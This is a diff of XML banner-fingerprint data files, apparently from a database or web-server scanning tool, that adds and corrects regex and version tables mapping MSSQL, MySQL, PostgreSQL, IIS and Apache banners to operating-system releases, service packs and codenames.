+    <regexp value="\bMint\b">
+        <info type="Linux" distrib="Mint"/>
+    </regexp>
+
+    <regexp value="\bPuppy\b">
+        <info type="Linux" distrib="Puppy"/>
+    </regexp>
+
+    <regexp value="Red[\-\_\ ]?Hat">
         <info type="Linux" distrib="Red Hat"/>
     </regexp>
 
@@ -105,7 +151,7 @@
         <info type="Linux" distrib="Ubuntu"/>
     </regexp>
 
-    <!-- Unices -->
+    <!-- BSD -->
 
     <regexp value="FreeBSD">
         <info type="FreeBSD"/>
@@ -121,7 +167,7 @@
 
     <!-- Mac OSX -->
 
-    <regexp value="Mac[\-\_\ ]*OSX">
+    <regexp value="Mac[\-\_\ ]?OSX">
         <info type="Mac OSX"/>
     </regexp>
 

data/xml/banner/mssql.xml

@@ -1,12 +1,142 @@
 <?xml version="1.0" ?>
 <root>
+    <signatures release="2008 R2">
+        <signature>
+            <version>
+                10.50.2418
+            </version>
+            <servicepack>
+                1 CTP
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.50.1797
+            </version>
+            <servicepack>
+                0+Cumulative Update 8
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.50.1790
+            </version>
+            <servicepack>
+                0+Q2494086
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.50.1777
+            </version>
+            <servicepack>
+                0+Cumulative Update 7
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.50.1765
+            </version>
+            <servicepack>
+                0+Cumulative Update 6
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.50.1753
+            </version>
+            <servicepack>
+                0+Cumulative Update 5
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.50.1746
+            </version>
+            <servicepack>
+                0+Cumulative Update 4
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.50.1734
+            </version>
+            <servicepack>
+                0+Cumulative Update 3
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.50.1720
+            </version>
+            <servicepack>
+                0+Cumulative Update 2
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.50.1702
+            </version>
+            <servicepack>
+                0+Cumulative Update 1
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.50.1600.1
+            </version>
+            <servicepack>
+                0
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.50.1450.3
+            </version>
+            <servicepack>
+                0
+            </servicepack>
+        </signature>
+    </signatures>
     <signatures release="2008">
+        <signature>
+            <version>
+                10.00.4311
+            </version>
+            <servicepack>
+                2+Q2494094
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.4285
+            </version>
+            <servicepack>
+                2+Cumulative Update 4
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.4279
+            </version>
+            <servicepack>
+                2+Cumulative Update 3
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.4272
+            </version>
+            <servicepack>
+                2+Cumulative Update 2
+            </servicepack>
+        </signature>
         <signature>
             <version>
                 10.00.4266
             </version>
             <servicepack>
-                0+Cumulative Update 1 for 2
+                2+Cumulative Update 1
             </servicepack>
         </signature>
         <signature>
@@ -14,7 +144,47 @@
                 10.00.4000
             </version>
             <servicepack>
-                0+2
+                2
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.2841
+            </version>
+            <servicepack>
+                1+Q2494100
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.2821
+            </version>
+            <servicepack>
+                1+Cumulative Update 14
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.2816
+            </version>
+            <servicepack>
+                1+Cumulative Update 13
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.2808
+            </version>
+            <servicepack>
+                1+Cumulative Update 12
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.2804
+            </version>
+            <servicepack>
+                0+Q2413738
             </servicepack>
         </signature>
         <signature>
@@ -22,7 +192,7 @@
                 10.00.2799
             </version>
             <servicepack>
-                0+Cumulative Update 10 for 1
+                1+Cumulative Update 10
             </servicepack>
         </signature>
         <signature>
@@ -30,7 +200,7 @@
                 10.00.2789
             </version>
             <servicepack>
-                0+Cumulative Update 9 for 1
+                1+Cumulative Update 9
             </servicepack>
         </signature>
         <signature>
@@ -38,7 +208,7 @@
                 10.00.2775
             </version>
             <servicepack>
-                0+Cumulative Update 8 for 1
+                1+Cumulative Update 8
             </servicepack>
         </signature>
         <signature>
@@ -46,7 +216,7 @@
                 10.00.2766
             </version>
             <servicepack>
-                0+Cumulative Update 7 for 1
+                1+Cumulative Update 7
             </servicepack>
         </signature>
         <signature>
@@ -70,7 +240,7 @@
                 10.00.2757
             </version>
             <servicepack>
-                0+Cumulative Update 6 for 1
+                1+Cumulative Update 6
             </servicepack>
         </signature>
         <signature>
@@ -78,7 +248,15 @@
                 10.00.2746
             </version>
             <servicepack>
-                0+Cumulative Update 5 for 1
+                1+Cumulative Update 5
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.2740
+            </version>
+            <servicepack>
+                0+Q976761
             </servicepack>
         </signature>
         <signature>
@@ -86,7 +264,7 @@
                 10.00.2734
             </version>
             <servicepack>
-                0+Cumulative Update 4 for 1
+                1+Cumulative Update 4
             </servicepack>
         </signature>
         <signature>
@@ -94,7 +272,7 @@
                 10.00.2723
             </version>
             <servicepack>
-                0+Cumulative Update 3 for 1
+                1+Cumulative Update 3
             </servicepack>
         </signature>
         <signature>
@@ -102,7 +280,7 @@
                 10.00.2714
             </version>
             <servicepack>
-                0+Cumulative Update 2 for 1
+                1+Cumulative Update 2
             </servicepack>
         </signature>
         <signature>
@@ -118,7 +296,7 @@
                 10.00.2710
             </version>
             <servicepack>
-                0+Cumulative Update 1 for 1
+                1+Cumulative Update 1
             </servicepack>
         </signature>
         <signature>
@@ -126,7 +304,7 @@
                 10.00.2531
             </version>
             <servicepack>
-                0+1
+                1
             </servicepack>
         </signature>
         <signature>
@@ -153,6 +331,14 @@
                 0+Cumulative Update 8
             </servicepack>
         </signature>
+        <signature>
+            <version>
+                10.00.1818
+            </version>
+            <servicepack>
+                0+Q973601
+            </servicepack>
+        </signature>
         <signature>
             <version>
                 10.00.1812
@@ -201,6 +387,22 @@
                 0+Q958611
             </servicepack>
         </signature>
+        <signature>
+            <version>
+                10.00.1763
+            </version>
+            <servicepack>
+                0+Q956717
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                10.00.1755
+            </version>
+            <servicepack>
+                0+Q957387
+            </servicepack>
+        </signature>
         <signature>
             <version>
                 10.00.1750
@@ -243,12 +445,36 @@
         </signature>
     </signatures>
     <signatures release="2005">
+        <signature>
+            <version>
+                9.00.5292
+            </version>
+            <servicepack>
+                4+Q2494123
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.5266
+            </version>
+            <servicepack>
+                4 Cumulative Update 3
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.5254
+            </version>
+            <servicepack>
+                4 Cumulative Update 1
+            </servicepack>
+        </signature>
         <signature>
             <version>
                 9.00.5000
             </version>
             <servicepack>
-                0+4 0
+                4
             </servicepack>
         </signature>
         <signature>
@@ -256,7 +482,31 @@
                 9.00.4912
             </version>
             <servicepack>
-                0+4 CTP
+                4 CTP
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.4340
+            </version>
+            <servicepack>
+                3+Q2494112
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.4325
+            </version>
+            <servicepack>
+                3+Q2438344
+            </servicepack>
+        </signature>
+        <signature>
+            <version>
+                9.00.4315
+            </version>
+            <servicepack>
+                3+Q2438344
             </servicepack>
         </signature>
         <signature>
@@ -344,7 +594,7 @@
                 9.00.4224
             </version>
             <servicepack>
-                0+Q971409
+                3+Q971409
             </servicepack>
         </signature>
         <signature>
@@ -384,7 +634,7 @@
                 9.00.4053
             </version>
             <servicepack>
-                0+3
+                3
             </servicepack>
         </signature>
         <signature>
@@ -392,7 +642,7 @@
                 9.00.4035
             </version>
             <servicepack>
-                0+3
+                3
             </servicepack>
         </signature>
         <signature>
@@ -2076,7 +2326,7 @@
                 8.00.2283
             </version>
             <servicepack>
-                0+Q971524
+                4+Q971524
             </servicepack>
         </signature>
         <signature>

data/xml/banner/mysql.xml

@@ -0,0 +1,79 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<!--
+     References:
+     * https://en.wikipedia.org/wiki/Debian_version_history
+-->
+
+<root>
+    <regexp value="^([\d\.\-]+)[\-\_\ ].*">
+        <info dbms_version="1"/>
+    </regexp>
+
+    <!-- Windows -->
+    <regexp value="^([\d\.\-]+)[\-\_\ ].*nt$">
+        <info dbms_version="1" type="Windows"/>
+    </regexp>
+
+    <!-- Debian -->
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+potato">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="2.1" codename="potato"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+woody">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="3.0" codename="woody"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+sarge">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="3.1" codename="sarge"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+etch">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="4.0" codename="etch"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+lenny">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="5.0" codename="lenny"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+squeeze">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="6.0" codename="squeeze"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+wheezy">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="7" codename="wheezy"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+jessie">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="8" codename="jessie"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+stretch">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="9" codename="stretch"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+buster">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="10" codename="buster"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+bullseye">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="11" codename="bullseye"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+bookworm">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="12" codename="bookworm"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+trixie">
+        <info dbms_version="1" type="Linux" distrib="Debian" release="13" codename="trixie"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+(sid|unstable)">
+        <info dbms_version="1" type="Linux" distrib="Debian" codename="unstable"/>
+    </regexp>
+
+    <regexp value="^([\d\.]+)[\-\_]Debian[\-\_][\d\.]+testing">
+        <info dbms_version="1" type="Linux" distrib="Debian" codename="testing"/>
+    </regexp>
+
+</root>

data/xml/banner/postgresql.xml

@@ -0,0 +1,16 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<root>
+    <regexp value="PostgreSQL\s+([\w\.]+)">
+        <info dbms_version="1"/>
+    </regexp>
+
+    <!-- Windows -->
+    <regexp value="Visual C\+\+">
+        <info type="Windows"/>
+    </regexp>
+
+    <regexp value="mingw([\d]+)">
+        <info type="Windows"/>
+    </regexp>
+</root>

data/xml/banner/server.xml

@@ -2,24 +2,35 @@
 
 <!--
      References:
-     * http://www.http-stats.com/Server
-     * http://en.wikipedia.org
-     * http://distrowatch.com
+     * https://en.wikipedia.org/wiki/Internet_Information_Services
+     * https://distrowatch.com
 -->
 
 <root>
     <!-- Microsoft IIS -->
 
+    <regexp value="Microsoft-IIS/(10\.0)">
+        <info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="2016|2019|2022|10|11"/>
+    </regexp>
+
+    <regexp value="Microsoft-IIS/(8\.5)">
+        <info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="2012 R2|8.1"/>
+    </regexp>
+
+    <regexp value="Microsoft-IIS/(8\.0)">
+        <info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="2012|8"/>
+    </regexp>
+
     <regexp value="Microsoft-IIS/(7\.5)">
-        <info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="2008"/>
+        <info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="2008 R2|7"/>
     </regexp>
 
     <regexp value="Microsoft-IIS/(7\.0)">
-        <info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="Vista"/>
+        <info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="2008|Vista"/>
     </regexp>
 
     <regexp value="Microsoft-IIS/(6\.0)">
-        <info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="2003"/>
+        <info technology="Microsoft IIS" tech_version="1" type="Windows" distrib="2003|XP"/>
     </regexp>
 
     <regexp value="Microsoft-IIS/(5\.2)">
@@ -74,6 +85,22 @@
         <info type="Linux" distrib="CentOS" release="5"/>
     </regexp>
 
+    <regexp value="Apache/2\.2\.15 \(CentOS\)">
+        <info type="Linux" distrib="CentOS" release="6"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.6 \(CentOS\)">
+        <info type="Linux" distrib="CentOS" release="7"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.37 \(CentOS\)">
+        <info type="Linux" distrib="CentOS" release="8"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.48 \(CentOS\)">
+        <info type="Linux" distrib="CentOS" release="9"/>
+    </regexp>
+
     <!-- Apache: Debian -->
 
     <regexp value="Apache/1\.0\.5 \(Unix\) Debian/GNU">
@@ -112,24 +139,36 @@
         <info type="Linux" distrib="Debian" release="3.1" codename="sarge"/>
     </regexp>
 
-    <regexp value="Apache/1\.3\.34 \(Debian GNU\/Linux\)">
-        <info type="Linux" distrib="Debian" release="4.0" codename="etch"/>
-    </regexp>
-
     <regexp value="Apache/2\.2\.3 \(Debian\)">
-        <info type="Linux" distrib="Debian" release="4.0" codename="etch"/>
-    </regexp>
-
-    <regexp value="Apache/2\.2\.6 \(Debian\)">
-        <info type="Linux" distrib="Debian" release="4.0" codename="etch" updated="True"/>
+        <info type="Linux" distrib="Debian" release="4" codename="etch"/>
     </regexp>
 
     <regexp value="Apache/2\.2\.9 \(Debian\)">
-        <info type="Linux" distrib="Debian" release="5.0" codename="lenny"/>
+        <info type="Linux" distrib="Debian" release="5" codename="lenny"/>
     </regexp>
 
     <regexp value="Apache/2\.2\.16 \(Debian\)">
-        <info type="Linux" distrib="Debian" release="6.0" codename="testing squeeze|unstable sid"/>
+        <info type="Linux" distrib="Debian" release="6" codename="squeeze"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.22 \(Debian\)">
+        <info type="Linux" distrib="Debian" release="7" codename="wheezy"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.10 \(Debian\)">
+        <info type="Linux" distrib="Debian" release="8" codename="jessie"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.25 \(Debian\)">
+        <info type="Linux" distrib="Debian" release="9" codename="stretch"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.38 \(Debian\)">
+        <info type="Linux" distrib="Debian" release="10" codename="buster"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.48 \(Debian\)">
+        <info type="Linux" distrib="Debian" release="11" codename="bullseye"/>
     </regexp>
 
     <!-- Apache: Fedora -->
@@ -206,90 +245,215 @@
         <info type="Linux" distrib="Fedora" release="13" codename="Goddard"/>
     </regexp>
 
+    <regexp value="Apache/2\.2\.16 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="14" codename="Laughlin"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.17 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="15" codename="Lovelock"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.21 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="16" codename="Verne"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.22 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="17" codename="Beefy"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.3 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="18" codename="Spherical"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.4 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="19" codename="Schrodingers"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.6 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="20" codename="Heisenbug"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.10 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="21"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.12 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="22"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.16 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="23"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.18 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="24"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.23 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="25"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.25 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="26"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.28 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="27"/>
+    </regexp>
+
+
+    <regexp value="Apache/2\.4\.33 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="28"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.34 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="29"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.39 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="30"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.41 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="31"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.43 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="32"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.46 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="33|34"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.51 \(Fedora\)">
+        <info type="Linux" distrib="Fedora" release="35"/>
+    </regexp>
+
     <!-- Apache: FreeBSD -->
 
     <regexp value="Apache/2\.0\.16 \(FreeBSD\)">
-        <info type="Linux" distrib="FreeBSD" release="4.4"/>
+        <info type="FreeBSD" release="4.4"/>
     </regexp>
 
     <regexp value="Apache/2\.0\.28 \(FreeBSD\)">
-        <info type="Linux" distrib="FreeBSD" release="4.5"/>
+        <info type="FreeBSD" release="4.5"/>
     </regexp>
 
     <regexp value="Apache/2\.0\.36 \(FreeBSD\)">
-        <info type="Linux" distrib="FreeBSD" release="4.6"/>
+        <info type="FreeBSD" release="4.6"/>
     </regexp>
 
     <regexp value="Apache/2\.0\.43 \(FreeBSD\)">
-        <info type="Linux" distrib="FreeBSD" release="4.7|5.0"/>
+        <info type="FreeBSD" release="4.7|5.0"/>
     </regexp>
 
     <regexp value="Apache/2\.0\.44 \(FreeBSD\)">
-        <info type="Linux" distrib="FreeBSD" release="4.8"/>
+        <info type="FreeBSD" release="4.8"/>
     </regexp>
 
     <regexp value="Apache/2\.0\.47 \(FreeBSD\)">
-        <info type="Linux" distrib="FreeBSD" release="4.9"/>
+        <info type="FreeBSD" release="4.9"/>
     </regexp>
 
     <regexp value="Apache/2\.0\.49 \(FreeBSD\)">
-        <info type="Linux" distrib="FreeBSD" release="4.10"/>
+        <info type="FreeBSD" release="4.10"/>
     </regexp>
 
     <regexp value="Apache/2\.0\.52 \(FreeBSD\)">
-        <info type="Linux" distrib="FreeBSD" release="4.11"/>
+        <info type="FreeBSD" release="4.11"/>
     </regexp>
 
     <regexp value="Apache/2\.0\.46 \(FreeBSD\)">
-        <info type="Linux" distrib="FreeBSD" release="5.1"/>
+        <info type="FreeBSD" release="5.1"/>
     </regexp>
 
     <regexp value="Apache/2\.0\.48 \(FreeBSD\)">
-        <info type="Linux" distrib="FreeBSD" release="5.2.1"/>
+        <info type="FreeBSD" release="5.2.1"/>
     </regexp>
 
     <regexp value="Apache/2\.0\.50 \(FreeBSD\)">
-        <info type="Linux" distrib="FreeBSD" release="5.3"/>
+        <info type="FreeBSD" release="5.3"/>
     </regexp>
 
     <regexp value="Apache/2\.0\.53 \(FreeBSD\)">
-        <info type="Linux" distrib="FreeBSD" release="5.4"/>
+        <info type="FreeBSD" release="5.4"/>
     </regexp>
 
     <regexp value="Apache/2\.2\.0 \(FreeBSD\)">
-        <info type="Linux" distrib="FreeBSD" release="5.5|6.1"/>
+        <info type="FreeBSD" release="5.5|6.1"/>
     </regexp>
 
     <regexp value="Apache/2\.0\.54 \(FreeBSD\)">
-        <info type="Linux" distrib="FreeBSD" release="6.0"/>
+        <info type="FreeBSD" release="6.0"/>
     </regexp>
 
     <regexp value="Apache/2\.2\.3 \(FreeBSD\)">
-        <info type="Linux" distrib="FreeBSD" release="6.2"/>
+        <info type="FreeBSD" release="6.2"/>
     </regexp>
 
     <regexp value="Apache/2\.2\.6 \(FreeBSD\)">
-        <info type="Linux" distrib="FreeBSD" release="6.3|7.0"/>
+        <info type="FreeBSD" release="6.3|7.0"/>
     </regexp>
 
     <regexp value="Apache/2\.2\.9 \(FreeBSD\)">
-        <info type="Linux" distrib="FreeBSD" release="6.4|7.1"/>
+        <info type="FreeBSD" release="6.4|7.1"/>
     </regexp>
 
     <regexp value="Apache/2\.2\.11 \(FreeBSD\)">
-        <info type="Linux" distrib="FreeBSD" release="7.2"/>
+        <info type="FreeBSD" release="7.2"/>
     </regexp>
 
     <regexp value="Apache/2\.2\.14 \(FreeBSD\)">
-        <info type="Linux" distrib="FreeBSD" release="7.3"/>
+        <info type="FreeBSD" release="7.3"/>
     </regexp>
 
     <regexp value="Apache/2\.2\.13 \(FreeBSD\)">
-        <info type="Linux" distrib="FreeBSD" release="8.0"/>
+        <info type="FreeBSD" release="8.0"/>
     </regexp>
 
     <regexp value="Apache/2\.2\.15 \(FreeBSD\)">
-        <info type="Linux" distrib="FreeBSD" release="8.1"/>
+        <info type="FreeBSD" release="8.1"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.17 \(FreeBSD\)">
+        <info type="FreeBSD" release="8.2"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.21 \(FreeBSD\)">
+        <info type="FreeBSD" release="9.0"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.6 \(FreeBSD\)">
+        <info type="FreeBSD" release="9.2"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.9 \(FreeBSD\)">
+        <info type="FreeBSD" release="9.3"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.16 \(FreeBSD\)">
+        <info type="FreeBSD" release="10.3"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.27 \(FreeBSD\)">
+        <info type="FreeBSD" release="10.4"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.26 \(FreeBSD\)">
+        <info type="FreeBSD" release="11.1"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.39 \(FreeBSD\)">
+        <info type="FreeBSD" release="11.3"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.51 \(FreeBSD\)">
+        <info type="FreeBSD" release="12.3"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.46 \(FreeBSD\)">
+        <info type="FreeBSD" release="13.0"/>
     </regexp>
 
     <!-- Apache: Mandrake / Mandriva -->
@@ -395,7 +559,7 @@
     </regexp>
 
     <regexp value="Apache/2\.2\.15 \(Mandriva Linux/">
-        <info type="Linux" distrib="Mandriva" release="2010.1"/>
+        <info type="Linux" distrib="Mandriva" release="2010.1|2010.2"/>
     </regexp>
 
     <!-- Apache: Red Hat -->
@@ -423,23 +587,23 @@
     <regexp value="Apache/1\.3\.9 \(Unix\)  \(Red Hat/Linux\)">
         <info type="Linux" distrib="Red Hat" release="6.1" codename="Cartman"/>
     </regexp>
-    
+
     <regexp value="Apache/1\.3\.12 \(Unix\)  \(Red Hat/Linux\)">
         <info type="Linux" distrib="Red Hat" release="6.2|7.0" codename="Zoot|Guinness"/>
     </regexp>
-	
+
     <regexp value="Apache/1\.3\.19 \(Unix\)  \(Red-Hat/Linux\)">
         <info type="Linux" distrib="Red Hat" release="7.1" codename="Seawolf"/>
     </regexp>
- 	
+
     <regexp value="Apache/1\.3\.20 \(Unix\)  \(Red-Hat/Linux\)">
         <info type="Linux" distrib="Red Hat" release="7.2" codename="Enigma"/>
     </regexp>
- 	
+
     <regexp value="Apache/1\.3\.23 \(Unix\)  \(Red-Hat/Linux\)">
         <info type="Linux" distrib="Red Hat" release="7.3" codename="Valhalla"/>
     </regexp>
- 	
+
  	<regexp value="Apache/1\.3\.27 \(Unix\)  \(Red-Hat/Linux\)">
         <info type="Linux" distrib="Red Hat" release="7.1|7.2|7.3" codename="Seawolf|Enigma|Valhalla" updated="True"/>
     </regexp>
@@ -447,7 +611,7 @@
     <regexp value="Apache/2\.0\.40 \(Red Hat Linux\)">
         <info type="Linux" distrib="Red Hat" release="8.0|9" codename="Psyche|Shrike"/>
     </regexp>
-    
+
     <regexp value="Apache/1\.3\.22 \(Unix\)  \(Red-Hat/Linux\)">
         <info type="Linux" distrib="Red Hat" release="Enterprise 2.1" codename="Panama"/>
     </regexp>
@@ -464,6 +628,18 @@
         <info type="Linux" distrib="Red Hat" release="Enterprise 5" codename="Tikanga"/>
     </regexp>
 
+    <regexp value="Apache/2\.2\.15 \(Red Hat\)">
+        <info type="Linux" distrib="Red Hat" release="Enterprise 6" codename="Santiago"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.6 \(Red Hat\)">
+        <info type="Linux" distrib="Red Hat" release="Enterprise 7" codename="Maipo"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.37 \(Red Hat\)">
+        <info type="Linux" distrib="Red Hat" release="Enterprise 8" codename="Ootpa"/>
+    </regexp>
+
     <!-- Apache: SuSE -->
 
     <regexp value="Apache/1\.3\.6 \(Unix\) \(SuSE/Linux\)">
@@ -563,6 +739,42 @@
         <info type="Linux" distrib="SuSE" release="11.3"/>
     </regexp>
 
+    <regexp value="Apache/2\.2\.17 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="11.4"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.21 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="12.1"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.22 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="12.2|12.3"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.6 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="13.1"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.10 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="13.2"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.16 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="42.1"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.23 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="42.2|42.3"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.33 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="15"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.43 \(Linux/SuSE\)">
+        <info type="Linux" distrib="SuSE" release="15.3"/>
+    </regexp>
+
     <!-- Apache: Ubuntu -->
 
     <regexp value="Apache/2\.0\.50 \(Ubuntu\)">
@@ -613,9 +825,119 @@
         <info type="Linux" distrib="Ubuntu" release="10.10" codename="Maverick Meerkat"/>
     </regexp>
 
+    <regexp value="Apache/2\.2\.17 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="11.04" codename="Natty Narwhal"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.20 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="11.10" codename="Oneiric Ocelot"/>
+    </regexp>
+
+    <regexp value="Apache/2\.2\.22 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="12.04|12.10|13.04" codename="Precise Pangolin|Quantal Quetzal|Raring Ringtail"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.6 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="13.10" codename="Saucy Salamander"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.10 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="14.10|15.04" codename="utopic|vivid"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.12 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="15.10" codename="willy"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.18 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="16.04|16.10" codename="xenial|yakkety"/>
+    </regexp>
+
